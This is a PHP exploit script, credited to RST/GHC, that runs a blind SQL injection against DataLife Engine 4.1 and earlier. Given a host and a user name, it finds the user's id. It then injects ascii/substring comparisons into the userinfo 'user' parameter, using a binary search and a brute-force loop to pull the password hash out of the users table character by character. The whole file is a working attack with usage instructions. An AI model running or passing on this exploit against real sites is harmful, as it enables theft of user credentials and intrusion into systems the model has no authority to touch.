<?php error_reporting (E_ERROR); ini_set("max_execution_time",0); echo ' +========================================+ | RST/GHC Datalife SQL injection exploit | +========================================+ < > Lite Version for DLE <=4.1 < > '; if ($argc < 2 ){ print " Usage: " . $argv[0] . " <host> <user> [table prefix]\n"; print " ex.: " . $argv[0] . " datalife.engine.net admin\n"; credits(); exit; } //DEFINE USER ID $urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2]; $result = file_get_contents($urla); $str1 = 'user='; #index.php?do=pm&doaction=newpm&user= $position = strpos($result, $str1); if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();} $str2 = '">'; $pos = strpos($result, $str2, $position); $pos1 = $position+5; $user_id = intval(substr($result, $pos1, $pos-$pos1)); print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n"; //SOME defines (aka CONFIG =)) if (empty($argv[3])){ $prefix = 'dle_';} #define prefix of the tables. try to find it yourself =) it is easy =) else {$prefix = $argv[3];} $min = 48; # 0 $max = 122; # z if (check(">$min", 1) == 0 && check("<$max", 1) == 0) {print "\n Site is unvulnerable..."; credits();} for ($sn=1; $sn <= 32; $sn++) { blind($sn, $min, $max); } credits(); // REQUEST function function check($crcheck, $sn) { global $argv, $user_id, $prefix; $host = 'http://' . $argv[1] . '/index.php'; # argv[1] - host $name = $argv[2]; #user name $query = '?subaction=userinfo&user=' . $name .'%2527%20and%20ascii(substring((SELECT%20password%20FROM%20' . $prefix. 'users%20WHERE%20user_id='. $user_id .'),' . $sn . ',1))' .$crcheck . '/*'; # $http = $host . $query; #DEBUG #print $http . "\n"; $result = file_get_contents($http); // checking the answer $string = ': '.$name.'</h2>'; #CORRECT it FOR your version, kids =) #good idea is: 'do=pm&doaction=newpm&user='.$user_id; if (eregi($string, $result)) { return 1; } return 0; } //range function function blind($sn, $fmin, $fmax) { if (($fmax-$fmin)<5) { if (crack($fmin, $fmax, $sn) == 0){print "\n\rEXPLOIT FAILED..."; credits();} return;} $compare = intval($fmin + ($fmax-$fmin)/2); $crcheck = ">". $compare; if ( check($crcheck, $sn) == 1 ) { blind($sn, $compare, $fmax); } else { blind($sn, $fmin, $compare+1); } } //brute function function crack($cmin, $cmax, $sn) { for ($i=$cmin; $i <=$cmax; $i++){ $crcheck = "=$i"; if (check($crcheck, $sn) == 1){print chr($i); return 1;} } return 0; } function credits(){ print "\n\n+========================================+\n\r Credits: 1dt.w0lf & foster \n\r Copyright (c) RST/GHC"; print "\n\r http://rst.void.ru && http://ghc.ru\n\r+========================================+\n"; exit; } ?>